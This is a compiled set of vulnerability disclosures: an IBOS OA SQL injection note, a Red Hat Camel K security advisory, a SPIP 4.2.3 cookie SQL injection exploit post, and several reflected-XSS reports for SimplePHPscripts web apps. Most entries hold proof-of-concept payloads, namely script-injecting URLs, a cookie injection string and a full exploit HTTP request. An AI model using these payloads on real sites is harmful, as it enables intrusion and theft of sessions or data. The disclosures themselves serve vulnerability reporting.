A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects the function actionExport of the file ?r=recruit/interview/export&interviews=x of the component Interview Management Export. The manipulation of the argument interviews leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-232546 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Permalink

Cannot retrieve contributors at this time

SQL injection vulnerability exists in IBOS OA v4.5.5

official website:http://www.ibos.com.cn/

route:?r=recruit/interview/export&interviews=x

1.Function point: Integrated office = "Recruitment management =" Interview management = "Export

2.The actionExport() method is found, and the interviews parameters obtained are directly brought to fetchAll() under the model layer for data processing.

There are still some encapsulation processing operations of the method

CVE-2023-3449: cve/iboa oa.md at main · MinimoAgoni/cve

Red Hat Integration Camel K 1.10.1 release and security update is now available. The purpose of this text-only errata is to inform you about the security issues fixed. Red Hat Product Security has rated this update as having an impact of Important.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-4244: No description is available for this CVE.
* CVE-2022-4245: No description is available for this CVE.
* CVE-2022-39368: A flaw was found in the Eclipse Californium Scandium package. This issue occurs when failing handshakes don't clean up counters for throttling, causing the threshold to be reached without being released again, resulting in a denial of service. An attacker could submit a high quantity of server requests, leaving the server unable to respond.
* CVE-2022-41946: A flaw was found in org.postgresql. This issue allows the creation of a temporary file when using PreparedStatement.setText(int, InputStream) and PreparedStatemet.setBytea(int, InputStream). This could allow a user to create an unexpected file available to all users, which could end in unexpected behavior.
* CVE-2022-46363: A vulnerability was found in Apache CXF that could allow an attacker to perform a remote directory listing or code exfiltration. This issue only applies when the CXFServlet is configured with both the static-resources-list and redirect-query-check attributes. These attributes are not supposed to be used together, so the issue can only occur if the CXF service is misconfigured.
* CVE-2023-1370: A flaw was found in the json-smart package. This security flaw occurs when reaching a ‘[‘ or ‘{‘ character in the JSON input, and the code parses an array or an object, respectively. The 3PP does not have any limit to the nesting of such arrays or objects. Since nested arrays and objects are parsed recursively, nesting too many of them can cause stack exhaustion (stack overflow) and crash the software.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-28

Updated:

2023-06-28

**RHSA-2023:3906 - Security Advisory**

*   Overview

**Synopsis**

Important: Red Hat Integration Camel K 1.10.1 release security update

**Type/Severity**

Security Advisory: Important

**Topic**

Red Hat Integration Camel K 1.10.1 release and security update is now available. The purpose of this text-only errata is to inform you about the security issues fixed. Red Hat Product Security has rated this update as having an impact of Important.

**Description**

A security update for Camel K 1.10.1 is now available.  

The purpose of this text-only errata is to inform you about the security issues fixed with this release.  

*   json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)(CVE-2023-1370)
*   codehaus-plexus: Directory Traversal (CVE-2022-4244)
*   codehaus-plexus: XML External Entity (XXE) Injection (CVE-2022-4245)
*   scandium: Failing DTLS handshakes may cause throttling to block processing of records (CVE-2022-39368)
*   jdbc-postgresql: postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions (CVE-2022-41946)
*   Apache CXF: directory listing / code exfiltration (CVE-2022-46363)

A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Integration - Camel K 1 x86\_64

**Fixes**

*   BZ - 2145205 - CVE-2022-39368 scandium: Failing DTLS handshakes may cause throttling to block processing of records
*   BZ - 2149841 - CVE-2022-4244 codehaus-plexus: Directory Traversal
*   BZ - 2149843 - CVE-2022-4245 codehaus-plexus: XML External Entity (XXE) Injection
*   BZ - 2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions
*   BZ - 2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration
*   BZ - 2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)

**CVEs**

*   CVE-2022-4244
*   CVE-2022-4245
*   CVE-2022-39368
*   CVE-2022-41946
*   CVE-2022-46363
*   CVE-2023-1370

**References**

*   https://access.redhat.com/security/updates/classification/#important
*   https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q2

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:3906: Red Hat Security Advisory: Red Hat Integration Camel K 1.10.1 release security update

NewsLetter Script version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/newsletter-script-php/                        ││  Vendor   : SimplePHPscripts                                                           ││  Software : NewsLetter Script 2.4                                                      ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/tb0g5"><script>alert(1)</script>kp1ea?cat_id=4[-] Done

NewsLetter Script 2.4 Cross Site Scripting

Simple Forum version 2.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/simple-forum-php/                             ││  Vendor   : SimplePHPscripts                                                           ││  Software : Simple Forum 2.7                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/g63ed"><script>alert(1)</script>e1nm2?act=new&cat_id=Path: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?p=b35ek%22%3e%3cscript%3ealert(1)%3c%2fscript%3eqr2hm&cat_id=&ordType=ASC&ordBy=publish_date[-] Done

Simple Forum 2.7 Cross Site Scripting

Simple Blog version 3.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/simple-blog-php/                              ││  Vendor   : SimplePHPscripts                                                           ││  Software : Simple Blog 3.2                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/bxsfz"><script>alert(1)</script>tkwni?p=2&cat_id=&search=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?pid=59&p=&search=&cat_id=&SysMessage=uyd1u%3cscript%3ealert(1)%3c%2fscript%3ey6sfb[-] Done

Simple Blog 3.2 Cross Site Scripting

Photo Gallery version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/photo-gallery-php/                            ││  Vendor   : SimplePHPscripts                                                           ││  Software : Photo Gallery 2.0                                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/fm7sk"><script>alert(1)</script>xfvd1?cat_id=5[-] Done

Photo Gallery 2.0 Cross Site Scripting

SPIP version 4.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server SideSensitive information Disclosure!## Author: nu11secur1ty## Date: 06.28.2023## Vendor: https://www.spip.net/en_rubrique25.html## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip## Reference: https://portswigger.net/web-security/information-disclosure## Description:The spip_session cookie appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the spip_session cookie, anda database error message was returned. Two single quotes were thensubmitted and the error message disappeared. You should review thecontents of the error message, and the application's handling of otherinput, to confirm whether a vulnerability is present.Additionally, the payload ' and '8025'='8025 were submitted in thespip_session cookie, and a database error message was returned.The attacker who has an account easily can dump almost all sensitiveinformation from the server. This is the wrong configuration of thesessions of this app and a serious bug in the backend execution -function modules of this app which bug is coming from the developmentteam of this web application! No one user account or even broadcastadmin account, must not be seeing inside information of the server,except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! fromthe side of the developers of this web app.STATUS: HIGH-CRITICAL Vulnerability[+]Exploit:```GETGET /pwnedhost7/ecrire/?exec=info HTTP/1.1Host: 192.168.100.45Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;spip_session=1_c9209323400f315bb516fdc7c5345eaeCache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)## Time spend:03:15:00

SPIP 4.2.3 SQL Injection

News Script Pro version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/news-script-php-pro/                          ││  Vendor   : SimplePHPscripts                                                           ││  Software : News Script Pro is 2.4                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/mn71q"><script>alert(1)</script>p15vr?cat_id=&p=2Path: /preview.phphttps://website/preview.php?id=467&p=2&search=&SysMessage=ahw5l%3Cscript%3Ealert(1)%3C/script%3Eulvrb[-] Done

News Script Pro 2.4 Cross Site Scripting

Funeral Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/funeral-script-php/                           ││  Vendor   : SimplePHPscripts                                                           ││  Software : Funeral Script 3.1                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/a8udq"><script>alert(1)</script>zl141?id=11&p=&search=&SysMessage=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=&search=&SysMessage=phl3z%3cscript%3ealert(1)%3c%2fscript%3ea504dPath: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=y26tx%22%3e%3cscript%3ealert(1)%3c%2fscript%3ellgzs&search=&SysMessage=[-] Done

Funeral Script 3.1 Cross Site Scripting

FAQ Script version 2.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/faq-script-php/                               ││  Vendor   : SimplePHPscripts                                                           ││  Software : FAQ Script 2.3                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/hov24"><script>alert(1)</script>mcpji?act=faq&cat_id=1&search=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?act=new&SysMessage=c513c%3cscript%3ealert(1)%3c%2fscript%3eujbsi[-] Done

Tag

#sql